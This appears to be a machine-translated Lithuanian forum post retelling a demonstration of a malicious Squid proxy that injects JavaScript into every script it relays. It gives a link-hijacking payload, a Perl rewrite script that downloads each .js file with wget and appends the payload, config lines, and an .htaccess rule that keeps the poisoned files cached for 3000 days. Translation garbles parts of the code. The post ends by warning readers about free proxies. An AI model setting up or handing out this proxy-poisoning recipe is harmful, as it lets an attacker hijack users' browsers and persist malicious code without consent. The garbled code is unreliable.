Šį pranešimą paskutinį kartą redagavo Mo Xiaowen 2015-6-7 23:19
Tai galima padaryti tiesiog pakeičiant SQUID konfigūraciją
Kas yra SQUID?
"Squid" yra programinė įranga, kuri talpykloje saugo interneto duomenis, gauna atsisiuntimo užklausas iš vartotojų ir automatiškai apdoroja atsisiųstus duomenis. Kai vartotojas nori atsisiųsti pagrindinį puslapį, jis gali nusiųsti užklausą "Squid", paprašyti "Squid" atsisiųsti jį jo vardu, tada "Squid" prisijungia prie svetainės ir prašo pagrindinio puslapio, o tada siunčia pagrindinį puslapį vartotojui, išlaikydamas atsarginę kopiją, kai kiti vartotojai kreipiasi dėl to paties puslapio, "Squid" iš karto siunčia išsaugotą atsarginę kopiją vartotojui, kad vartotojas pajustų, kad greitis yra gana didelis. "Squid" gali naudoti tarpinius protokolus, tokius kaip HTTP, FTP, GOPHER, SSL ir WAIS, o "Squid" gali tai tvarkyti automatiškai, o jūs galite nustatyti "Squid" pagal savo poreikius, kad išfiltruotumėte nepageidaujamus dalykus.
"Squid" gali veikti daugelyje operacinių sistemų, tokių kaip AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 ir kt.
Įgyvendinimas yra labai paprastas:
1. Įdiekite "Squid" viename "Linux" serveryje.
2. Pakeiskite serverio kodą, įterpkite mūsų kodo dalį į visus perduodamus javascrip ir išsiųskite jį.
3. Nustatykite kuo ilgesnį modifikuoto js failo talpyklos laiką.
Šis metodas taip pat taikomas svetainėms, kuriose įjungtas SSL, jei svetainė įkelia nesaugų šaltinį (pvz., HTTP svetainės jquery), dauguma naršyklių pateiks įspėjimą, tačiau nedaugelis žmonių atkreipia dėmesį.
Chema sakė, kad daugiau nei 5,000 žmonių naudojo jo tarpinį serverį praėjus kelioms dienoms po to, kai jis jį išleido, ir dauguma žmonių jį naudojo blogiems dalykams daryti, nes jie naudojo tarpinį serverį, todėl jie manė, kad jis yra anonimiškas ir saugus, tačiau jie niekada nesitikėjo, kad tarpinis serveris taip pat padarys blogus dalykus.
Padarykite savo kenkėjišką tarpinį serverį
Jei jau turite "Squid" tarpinį serverį, jums taip pat reikės žiniatinklio serverio, pvz., "Apache".
1 veiksmas: sukurkite naudingą krovinį
Aš naudoju paprastą scenarijų kaip demonstraciją nukreipti visus hipersaitus į savo svetainę.
/etc/squid/payload.js
[mw_shl_code=javascrip pašalinti t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
2 veiksmas: parašykite scenarijų, kad užkrėstumėte visus JS failus
/etc/squid/poison.pl
[mw_shl_code=perl,true]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
while(<>)
{
chomp $_;
if($_ =- /(.*.js)/i)
{
$url = 1 USD;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
sistema ("chmod o+r /var/www/tmp/$pid-$count.js");
sistema ("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
spausdinti "http://127.0.0.1:80/tmp/$pid-$count.js";
}
kitaip
{
spausdinti "$_";
}
$count++;
}[/mw_shl_code]
Šis scenarijus naudoja wget, kad gautų originalų puslapio javascrip ir pašalintų t failą, tada pridėtų kodą į /etc/squid/payload.js ir nusiųstų modifikuotą failą klientui, o jums reikia sukurti /var/www/tmp katalogą ir leisti kalmarams jame rašyti failus. Šiame kataloge saugomi modifikuoti js failai.
3 veiksmas: sujunkite aukščiau pateiktą scenarijų su kalmarais
Pridėkite jį į /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
4 veiksmas: kad talpykla niekada nesugestų
/var/www/tmp/.htaccess
[mw_shl_code=html,true] Galiojimo laikasAktyvus
PasibaigiaNumatytoji "prieiga plius 3000 dienų"[/mw_shl_code]
Tai lieps "Apache" duoti jam ilgą galiojimo laiką, kol vartotojas išvalys talpyklą.
Jei prijungsite šį tarpinį serverį, spustelėję bet kurį hipersaitą nukreipsite jus į mano svetainę, o talpykla vis tiek egzistuos, net jei vėliau nenaudosite tarpinio serverio. Aš tiesiog naudojau neagresyvią naudingąją apkrovą, o naudodami šį metodą įsilaužėliai gali padaryti daug daugiau. Taigi priminkite sau ir draugams, kad jie būtų atsargūs naudodami nemokamus tarpinius serverius.
|
Paskelbta 2015-01-19 02:34:56
|
|
|
|
Paskelbta 2015-01-19 08:48:45
|
Savininkas|
Paskelbta 2015-01-20 14:36:06
|
